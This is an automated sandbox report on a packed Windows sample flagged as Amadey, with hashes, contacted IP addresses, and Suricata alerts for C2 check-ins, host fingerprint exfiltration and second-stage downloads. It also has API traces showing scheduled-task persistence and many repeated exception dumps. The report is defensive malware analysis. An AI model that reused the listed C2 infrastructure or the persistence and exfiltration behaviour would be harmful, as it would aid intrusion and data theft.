Summary | ZeroBOX

Amday.exe

Ave Maria WARZONE RAT Generic Malware Malicious Library Admin Tool (Sysinternals etc ...) MPRESS UPX PE File PE64 DLL OS Processor Check PE32 .NET EXE JPEG Format
Category Machine Started Completed
FILE s1_win7_x6403_us June 14, 2023, 7:24 p.m. June 14, 2023, 7:28 p.m.
Size 3.7MB
Type MS-DOS executable, MZ for MS-DOS
MD5 325cedfb3e4d23ddf1062ad55b6f6b6e
SHA256 38d7fbdc314f881b461c766742a26d3df72c553d25c8f1c20da1adcdbea1afef
CRC32 E13113FC
ssdeep 98304:uSWz0m6iijzsGupvTo9GDd1HwAOiU0KIX6ksJc:Tfti2Ys9GDd1HjpU0pX6m
Yara
  • UPX_Zero - UPX packed file
  • MPRESS_Zero - MPRESS packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
104.21.46.153 Active Moloch
164.124.101.2 Active Moloch
5.181.216.116 Active Moloch
62.182.156.152 Active Moloch
95.143.190.57 Active Moloch
77.91.68.63 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49173 -> 62.182.156.152:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 62.182.156.152:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 5.181.216.116:80 -> 192.168.56.103:49174 2014819 ET INFO Packed Executable Download Misc activity
TCP 5.181.216.116:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.181.216.116:80 -> 192.168.56.103:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 95.143.190.57:15647 -> 192.168.56.103:49181 2029217 ET MALWARE Arechclient2 Backdoor CnC Init Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 62.182.156.152:80 2044597 ET MALWARE Amadey Bot Activity (POST) M1 A Network Trojan was detected
TCP 192.168.56.103:49172 -> 62.182.156.152:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49179 -> 104.21.46.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49172 -> 62.182.156.152:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49172 -> 62.182.156.152:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 62.182.156.152:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.182.156.152:80 -> 192.168.56.103:49172 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 62.182.156.152:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49179
104.21.46.153:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com b4:d4:31:ca:e7:af:db:25:ee:bd:ac:39:b6:7f:82:90:e4:8c:6e:11

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d16ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d16ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d16990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d171d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d171d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00d17450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .MPRESS1
section .MPRESS2
resource name WAV
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefdbfa49d
rundll+0x318050 64+0x319070 @ 0x7fef34d9070
rundll+0x31801b 64+0x31903b @ 0x7fef34d903b
HeapWalk-0x1ce0 kernel32+0x0 @ 0x76fc0000
0xef038
0xef038
0xef038

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008e
exception.offset: 42141
exception.address: 0x7fefdbfa49d
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
